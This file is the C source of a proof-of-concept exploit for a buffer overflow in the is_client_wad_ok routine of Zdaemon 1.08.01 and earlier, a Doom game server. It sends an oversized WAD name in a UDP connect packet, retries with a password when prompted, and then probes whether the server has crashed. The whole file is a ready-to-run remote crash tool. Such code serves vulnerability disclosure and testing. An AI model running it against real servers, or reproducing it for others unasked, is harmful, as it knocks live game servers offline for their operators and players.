/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "zd_huffman.c"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif



#define VER                 "0.1"
#define PORT                10666
#define BUFFSZ              8192
#define BOFSZ               300

#define PUT16(x,y)          *(u_short *)x = y; \
                            x += 2;
#define PUT32(x,y)          *(u_int *)x = y; \
                            x += 4;

#define LAUNCHER_CHALLENGE  777123
#define VERSION             108
#define MAX_UDP_PACKET      1400
#define	CONNECT_CHALLENGE   200
#define NETWORK_ERROR       254



int addwad(u_char *data, u_char *wad, u_char *crc);
u_char **info_proto(u_char *data, int len, int *ver, int *wads);
void delimit(u_char *data);
int mycpy(u_char *dst, u_char *src);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock, int sec);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    u_int   seed;
    int     sd,
            i,
            len,
            wads = 0,
            ver  = VERSION;
    u_short port = PORT;
    u_char  buff[BUFFSZ],
            password[128],
            bof[BUFFSZ],
            huffbuff[BUFFSZ],
            **wad,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Zdaemon <= 1.08.01 buffer-overflow in is_client_wad_ok " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port    = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    seed      = time(NULL);
    *password = 0;

    printf("- query server:\n");

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p = buff;
    PUT32(p, LAUNCHER_CHALLENGE);
    len = send_recv(sd, buff, p - buff, buff, sizeof(buff), 1);

    close(sd);
    wad = info_proto(buff, len, &ver, &wads);

    HuffInit();

redo:
    printf("- start connection:\n");

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p = buff;
    *p++ = 0xff;                            // no compression
    *p++ = CONNECT_CHALLENGE;               // cmd
    *p++ = ver;                             // version
    *p++ = seed;                            // level
    p   += mycpy(p, password);              // password
    *p++ = 2;                               // number of wads
    memset(bof, 'a', BOFSZ);
    bof[BOFSZ] = 0;                         // wad bof
    p   += addwad(p, bof, "f3a242bf226eb10c28b8c7fccb18c88f");

    len = p - buff;                         // check length if major than max
    if(len > (MAX_UDP_PACKET + 32)) len = MAX_UDP_PACKET + 32;

    len = send_recv(sd, buff, len, buff, sizeof(buff), 0);
    close(sd);
    if(len < 0) goto quit;

    HuffDecode(buff, huffbuff, len, &len);  // decompression

    if(huffbuff[0] == NETWORK_ERROR) {
        p = huffbuff + 1;
        goto error;
    }
    if(huffbuff[5] == NETWORK_ERROR) {
        p = huffbuff + 6;
        goto error;
    }

error:
    if(stristr(p, "password")) {
        printf("\n- server is protected with password, insert the keyword:\n  ");
        fgets(password, sizeof(password), stdin);
        delimit(password);
        goto redo;

    } else {
        printf("\n"
            "Error: client has not been accepted:\n"
            "       %s\n",
            p);
        exit(1);
    }

quit:
    printf("- wait some seconds\n");
    for(i = 3; i; i--) {
        printf("%d\r", i);
        sleep(ONESEC);
    }

    printf("- check server:\n");

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p = buff;
    PUT32(p, LAUNCHER_CHALLENGE);
    if(send_recv(sd, buff, p - buff, buff, sizeof(buff), 0) < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server does not seem vulnerable\n\n");
    }

    close(sd);

    for(i = 0; i < wads; i++) free(wad[i]); // free everything
    free(wad);

    return(0);
}



int addwad(u_char *data, u_char *wad, u_char *crc) {
    int     i,
            tmp;
    u_char  *p;

    p = data;
    p += mycpy(p, wad);

    for(i = 0; i < 16; i++) {
        sscanf(crc, "%02x", &tmp);
        crc += 2;
        *p++ = tmp;
    }
    return(p - data);
}



u_char **info_proto(u_char *data, int len, int *ver, int *wads) {
    int     i,
            num;
    u_char  *limit,
            **wad;

    limit = data + len;
    printf("  Master ch  %d\n", *(u_int *)data);            data += 4;
    printf("  Hostname   %s\n", data);                      data += strlen(data) + 1;
    printf("  Players    %hhu/%hhu\n", data[0], data[1]);   data += 2;
    printf("  Mapname    %s\n", data);                      data += strlen(data) + 1;
    num = *data++;
    *wads = num + 1;
    wad = malloc(*wads * sizeof(char *));                   // +1 for Iwad too
    if(num) {
        printf("  Wads:\n");
        for(i = 0; i < num; i++) {
            wad[i] = strdup(data);
            printf("    %s ", data);                        data += strlen(data) + 1;
        }
        printf("\n");
    }
    printf("  Gametype   %hhu\n", *data++);
    printf("  Gamename   %s\n", data);                      data += strlen(data) + 1;
    wad[*wads - 1] = strdup(data);
    printf("  IWad       %s\n", data);                      data += strlen(data) + 1;
    printf("  Gameskill  %hhu\n", *data++);
    printf("  File path  %s\n", data);                      data += strlen(data) + 1;
    printf("  E-mail     %s\n", data);                      data += strlen(data) + 1;
    printf("  DMFlags    %u\n", *(u_int *)data);            data += 4;
    printf("  DMFlags2   %u\n", *(u_int *)data);            data += 4;
    num = *data++;
    if(num) {
        printf("  Players:\n");
        for(i = 0; i < num; i++) {
            printf("    %s ", data);                        data += strlen(data) + 1;
            printf("  %hu ", *(u_short *)data);             data += 2;
            printf("  %hu", *(u_short *)data);              data += 2;
            printf("  %hhu", *data++);
            printf("  %hu", *(u_short *)data);              data += 2;
            printf("\n");
        }
    }

    *ver = *(u_short *)data;                                data += 2;
    printf("  Version    %hu\n", *ver);
//    printf("  Ext info   %u\n", *(u_int *)data);          data += 4;
    data += 4;
    printf("  Password   %hhu\n", *data++);

    // come on, it's enough
    // that's all we need

    return(wad);
}



void delimit(u_char *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int mycpy(u_char *dst, u_char *src) {
    u_char  *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p++ = 0;
    return(p - dst);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
    int     retry,
            len;

    if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            fputs("\nError: socket timeout, no reply received\n\n", stdout);
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


